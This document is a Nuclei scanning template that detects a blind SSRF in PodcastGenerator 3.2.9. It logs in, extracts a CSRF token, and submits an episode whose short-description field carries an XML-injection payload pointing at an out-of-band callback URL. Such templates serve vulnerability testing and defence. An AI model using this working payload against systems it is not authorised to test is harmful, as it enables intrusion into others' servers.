134 lines
4.0 KiB
YAML
134 lines
4.0 KiB
YAML
id: podcast-generator-ssrf
|
|
|
|
info:
|
|
name: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
|
|
author: ritikchaddha,MrHarshvardhan
|
|
severity: high
|
|
description: |
|
|
This is a SSRF vulnerability via Xml injection found in PodcastGenerator 3.2.9.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51565
|
|
- https://mirabbasagalarov.medium.com/podcastgenerator-3-2-9-blind-ssrf-via-xml-injection-3795804467df
|
|
- https://github.com/PodcastGenerator/PodcastGenerator
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
tags: podcastgenerator,ssrf,authenticated,intrusive
|
|
variables:
|
|
string: "{{rand_text_alpha(7)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /podcast/PodcastGenerator/admin/login.php?login=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username={{username}}&password={{password}}
|
|
- |
|
|
GET /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /podcast/PodcastGenerator/admin/episodes_upload.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="file"; filename="{{string}}.jpg"
|
|
Content-Type: image/jpeg
|
|
|
|
{{rand_text_alpha(50)}}
|
|
{{rand_text_alpha(50)}}
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="title"
|
|
|
|
{{string}}
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="shortdesc"
|
|
|
|
test]]></shortdescPG><imgPG path="">http://{{interactsh-url}}</imgPG><shortdescPG><![CDATA[test
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="category[ ]"
|
|
|
|
uncategorized
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="date"
|
|
|
|
2023-10-30
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="time"
|
|
|
|
12:26
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="episodecover"; filename=""
|
|
Content-Type: application/octet-stream
|
|
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="longdesc"
|
|
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="episodenum"
|
|
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="seasonnum"
|
|
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="itunesKeywords"
|
|
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="explicit"
|
|
|
|
no
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="authorname"
|
|
|
|
{{string}}
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="authoremail"
|
|
|
|
{{string}}@{{string}}.com
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="customtags"
|
|
|
|
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA
|
|
Content-Disposition: form-data; name="token"
|
|
|
|
{{token}}
|
|
------WebKitFormBoundary1WfeHRSBn1aNkQQA--
|
|
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- "Main Information"
|
|
- "Episode Cover:"
|
|
condition: and
|
|
|
|
extractors:
|
|
- type: regex
|
|
part: body_2
|
|
name: token
|
|
group: 1
|
|
regex:
|
|
- 'pe="hidden" name="token" value="([A-Za-z0-9]+)">'
|
|
internal: true
|
|
|
|
# digest: 4a0a00473045022100cd4fcba6c5f80131105cfd583a6f502efea96e3c4bb96eb50a8d6659dd4588f7022011f2a0f25f4e0135acfac85373879bd002065463d4a09d517970e17f205ebfb3:922c64590222798bb761d5b6d8e72950
|